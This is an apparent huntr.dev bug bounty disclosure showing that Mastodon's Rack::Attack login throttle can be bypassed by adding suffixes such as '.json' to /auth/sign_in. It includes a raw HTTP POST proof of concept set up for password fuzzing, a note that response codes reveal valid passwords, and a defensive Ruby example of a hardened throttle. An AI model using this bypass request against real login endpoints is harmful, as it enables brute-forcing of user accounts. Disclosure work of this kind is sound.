History: Jun 20, 2022 - 6:52 p.m.

Mastodon's Misconfigured Rack_Attack.rb Does Not Appropriately Protect Against Brute Force Attacks

2022-06-20 18:52:50
dievus
www.huntr.dev
Tags: mastadon, api, brute force, vulnerability, rack_attack.rb, misconfigured, bypass, intigriti, staging.mastodon.social, proof of concept, bounty, cve status

EPSS: 0.002 (Percentile: 59.6%)

Description

Mastodon relies on the rack_attack.rb file to manage API throttling in the application through the declaration of absolute paths (e.g., /auth/sign_in). By appending random strings of characters to the end of the directory in a POST request it is possible to bypass brute force protections. Tester attempted to file this finding through Intigriti as requested on GitHub; however, it is noted that Intigriti is phasing this project out. Tester utilized the staging.mastodon.social demo application, and also a local installation of the application, to confirm the vulnerability.

Tester was able to bypass sign-in restrictions by appending .json after the directory; however, any string is viable. It was possible to identify valid passwords based on a 406 response from the server, versus invalid attempts returning a 401 error. Rack_Attack declares a 300-request-per-5-minute limit, which appears to be the only appropriate restriction. Provided an attacker stays below 300 requests in 5 minutes, it is possible to completely bypass all restrictions.

Note that the tester already has a proof-of-concept fix for the issue and is happy to work with the maintainer to fix it. Tester would ask that a comparable bounty amount be applied by the maintainer as it would be with Intigriti, where the low end of a valid finding is 1,000 pounds and the high end is 20,000 pounds. Tester would have submitted through Intigriti had it not been for the pending closure of the program, unfortunately. Tester does realize that the prize pot is depleted on this platform, and it would be at the discretion of the maintainer to honor a payment or not. Either way, CVE status will be requested due to the severity of the finding.

Proof of Concept

POST /auth/sign_in.json HTTP/1.1
Host: staging.mastodon.social
Cookie: _mastodon_session=wM5JZ5uFbag8V81Jk2jWsVES1Gl8dkukxjZdaN%2FnNNHh9UFamiUn62zY8Mh9nR8zu82pD%2FddQndPV8rJTgIiMPppVybkaJ3ULzMmawkADNUvx7q9Lz8vmT0svrnKDfL9MqnQ5YhKEvIq6c3LPBM8O1U%2FT4qQk2FZIoyjc1S1O8kbBBj6eYztCHLDdC25PnZ9%2Fd0IOB2fEW9qDnvNrNzxw77UcgRHjt9GWCw%2BPTh1aBS6J8a9f94ZXf%2BlgE2dCubsH7V5PL8Ijuq1bsePt27q1Pb8TbXzCBaO%2FA%3D%3D--JIrYMu6fwlXhF3%2FU--cSi5lAMp4z2IyeM1WfCzdQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Origin: https://staging.mastodon.social
Dnt: 1
Referer: https://staging.mastodon.social/auth/sign_in
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

authenticity_token=1ItjuEy9z3KwYRBwjKswfJWvwnGXIrnLvn7AT2czIG1jYpaN193lao-RldsgPydOi06hRmp12FXs6zK0jd6sZA&user%5Bemail%5D=themayor%40intigriti.me&user%5Bpassword%5D=§testpasswordhere§&button=

None of the API endpoints noted in the Rack_Attack configuration appear to have appropriate constraints, which would allow comparable brute force attempts against each.
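The following is an added example, not Mastodon's rack_attack.rb and not the tester's fix: it reconstructs the exact-path discriminator shape the description above attributes to the configuration (an assumption, since the real file is not on this page), puts a route-aware discriminator beside it, and runs both through a small in-memory throttle counter so the difference in what gets counted is visible without the rack-attack gem. The request struct, the 25-per-5-minutes limit and the IP address are constructed for the example.

```ruby
# Added example, not Mastodon's code: why an exact-path Rack::Attack
# discriminator never counts "/auth/sign_in.json", and a route-aware one
# that does. Requests are constructed; the rack-attack gem is not required.
# Minimal stand-in for the Rack::Request methods a discriminator uses.
Req = Struct.new(:verb, :path, :ip) do
  def post?
    verb == 'POST'
  end
end

LOGIN_PATH = '/auth/sign_in'
# Weak rule (the shape the report describes, assumed here): counted only on an
# exact string match, so any suffix the router still accepts is never tracked.
WEAK_LOGIN_RULE = ->(req) { req.ip if req.post? && req.path == LOGIN_PATH }
# Hardened rule: Rack::Attack runs before Rails routing, so normalise the raw
# path itself. The anchored regex tolerates an optional ".format" suffix and a
# trailing slash (what a Rails "(.:format)" route accepts) but nothing else.
LOGIN_ROUTE = %r{\A/auth/sign_in(?:\.[A-Za-z0-9]+)?/?\z}
STRICT_LOGIN_RULE = ->(req) { req.ip if req.post? && req.path.match?(LOGIN_ROUTE) }

# In-memory sliding-window counter standing in for Rack::Attack's cache store.
# blocked? returns true once a key has more than `limit` hits inside `period`.
class Throttle
  def initialize(rule, limit:, period:)
    @rule, @limit, @period = rule, limit, period
    @hits = Hash.new { |h, k| h[k] = [] }
  end

  def blocked?(req, now)
    key = @rule.call(req)
    return false if key.nil?               # nil key: request is not tracked at all
    window = @hits[key].select { |t| now - t < @period } << now
    @hits[key] = window
    window.size > @limit
  end
end

# 30 POSTs to "/auth/sign_in.json" from one constructed IP, one per second,
# against a 25-per-5-minutes login throttle; returns how many each rule blocked.
def blocked_counts(attempts: 30, limit: 25, period: 300)
  weak = Throttle.new(WEAK_LOGIN_RULE, limit: limit, period: period)
  strict = Throttle.new(STRICT_LOGIN_RULE, limit: limit, period: period)
  counts = { weak: 0, strict: 0 }
  attempts.times do |t|
    req = Req.new('POST', "#{LOGIN_PATH}.json", '203.0.113.7')
    counts[:weak] += 1 if weak.blocked?(req, t)
    counts[:strict] += 1 if strict.blocked?(req, t)
  end
  counts   # => {weak: 0, strict: 5}
end
```

The same normalisation should be applied to every throttle keyed on a literal path, which is what the sentence above about the other API endpoints implies.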

See the following link for a screenshot with bypass responses and times.
https://www.notion.so/themayor/Mastadon-Rack-Attack-7e665d571f4f407286480409594ef916
